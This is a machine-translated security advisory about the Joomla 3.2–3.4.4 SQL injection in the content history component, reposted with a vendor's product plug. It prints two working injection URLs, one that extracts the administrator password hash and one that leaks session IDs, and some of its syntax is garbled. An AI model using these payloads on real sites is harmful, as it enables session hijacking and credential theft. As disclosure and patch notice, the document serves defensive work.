Well-known CMS software Joomla Storage SQL Injection Vulnerability

Source: Internet
Author: User
Tags administrator password

recently, Trustwave spiderlabs researcher Asaf Orpani found the well-known CMS Joomla 3.2-3.4.4 version of SQL Injection vulnerability, the Security Dog Laboratory detection of the vulnerability of a huge harm, wide range, the use of low difficulty . The vulnerability has been fixed in the 3.4.5 release, please update the relevant website in a timely manner. In addition, the security dog is tested to protect against the vulnerability.

Detailed description of the vulnerability and how to use it

According to ASAF Orpani analysis, the SQL injection vulnerability exists in

/administrator/components/com_contenthistory/models/history.php Place.

The following lines of code that describe the Joomla principle can help us to exploit this vulnerability (PAYLOAD)

After executing the code, return to the following page, you can get the user session directly:

The following payload can be tested to obtain the administrator password directly:

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id =1&type_id=1&list[select]= (select 1 from (SELECT COUNT (*), concat (SELECT (select concat (password)) from%23__ Users limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X)

Shown

Above payload can not explode session_id, after our laboratory modified the following this paragraph could be perfect explosion session_id.

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1& list[select]= (select 1=updatexml (1,concat (0x5e24, (select session_id from jml_session limit 0,1), 0x5e24), 1))

As shown in the following:

And in a detailed understanding of the use of the vulnerability of the principle, the security of the dog-related technical personnel carried out the detection, and finally found that the Security Dog Products website Security Dog can defend the vulnerability, please rest assured that users use.



Well-known CMS software Joomla Storage SQL Injection Vulnerability

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.